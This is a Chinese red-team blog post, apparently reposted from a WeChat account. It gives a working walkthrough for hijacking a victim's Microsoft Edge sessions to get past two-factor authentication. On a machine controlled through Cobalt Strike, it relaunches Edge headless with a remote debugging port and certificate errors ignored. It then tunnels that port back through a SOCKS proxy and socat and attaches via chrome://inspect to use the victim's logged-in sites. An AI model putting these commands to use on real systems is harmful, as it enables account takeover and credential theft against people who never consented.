微软浏览器模式:绕过2FA认证的秘密武器

admin 2024年8月7日22:32:38评论18 views字数 1583阅读5分16秒阅读模式

上篇文章是google 浏览器的调试模式,这篇文章是讲微软的Microsoft Edge,Edge浏览器是用户常用的浏览器之一,与其它主流理论一样,是支持开发者模式的,网站开发人员可以借助Edge浏览器中的开发者模式来调试网页。且该模式还支持查看已保存的账号密码等等功能,非常实用

实验环境

cobalt strike

被控制端

Edge

谷歌浏览器

微软浏览器模式:绕过2FA认证的秘密武器

第一步先把对方的Edge关闭掉,然后被控机器运行下面代码

execute "C:Program Files (x86)MicrosoftEdgeApplicationmsedge.exe" --remote-debugging-port=9222 -user-data-dir=%localappdate%tempmy-edge-dir --headless --ignore-certificate-errors about:blank

解释下命令意思

--remote-debugging-port=9222:这个选项指定Edge浏览器的远程调试端口号为9222。这意味着您可以使用此端口连接到浏览器并进行远程调试。

-user-data-dir=%localappdata%tempmy-edge-dir:这个选项指定了Edge浏览器的用户数据目录。在这里,它将用户数据保存在本地应用数据目录下的tempmy-edge-dir文件夹中。这对于创建一个干净的临时浏览器环境非常有用。

--headless:这个选项告诉Edge浏览器在无头(headless)模式下运行,即没有图形用户界面。它通常用于自动化测试和脚本执行,因为不需要显示浏览器窗口。

--ignore-certificate-errors:此选项告诉Edge浏览器忽略SSL证书错误。在某些情况下,您可能需要这样做,但请小心使用,因为忽略证书错误可能会降低安全性。

about:blank:这是启动Edge浏览器时要加载的初始页面。在这种情况下,它加载一个空白页面。

微软浏览器模式:绕过2FA认证的秘密武器

开启9999代理

socks 9999

微软浏览器模式:绕过2FA认证的秘密武器

使用socat端口转发

socat TCP4-LISTEN:9222,FORK SOCKS4:127.0.0.1:127.0.0.1:9222,SOCKSPORT=9999

socat:这是一个命令行实用程序,用于在两个端点之间创建双向数据流(例如,套接字、文件、管道等)。

TCP4-LISTEN:9222,FORK:这部分命令告诉socat在端口9222上监听传入的TCP连接,并创建一个新的进程来处理每个连接。换句话说,它在端口9222上设置了一个TCP服务器。

SOCKS4:127.0.0.1:127.0.0.1:9222,SOCKSPORT=9999:这部分命令告诉socat使用SOCKS4代理协议,将传入的连接从本地主机(127.0.0.1)的端口9222转发到本地主机(127.0.0.1)的另一个端口,这个另一个端口是9222。同时,它还指定了SOCKS代理服务器的端口为9999。这意味着传入的连接将通过SOCKS4代理服务器进行中转,然后达到目标地址127.0.0.1的9222端口。

总之,这个命令的作用是将通过TCP连接到达端口9222的流量经过SOCKS4代理服务器,然后转发到本地主机的另一个端口9222。这种配置可以用于网络代理或端口转发的需求。

打开谷歌浏览器输入

chrome://inspect 

输入IP地址连接

微软浏览器模式:绕过2FA认证的秘密武器

这样就可以登录网站

微软浏览器模式:绕过2FA认证的秘密武器

参考

https://pbs.twimg.com/media/Fy0L-HMXwAARlGv?format=jpg&name=large

https://pbs.twimg.com/media/Fy0L-HIXsAEYoe6?format=jpg&name=large

原文始发于微信公众号(红队笔记录):微软浏览器模式:绕过2FA认证的秘密武器

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月7日22:32:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   微软浏览器模式:绕过2FA认证的秘密武器https://cn-sec.com/archives/2017356.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息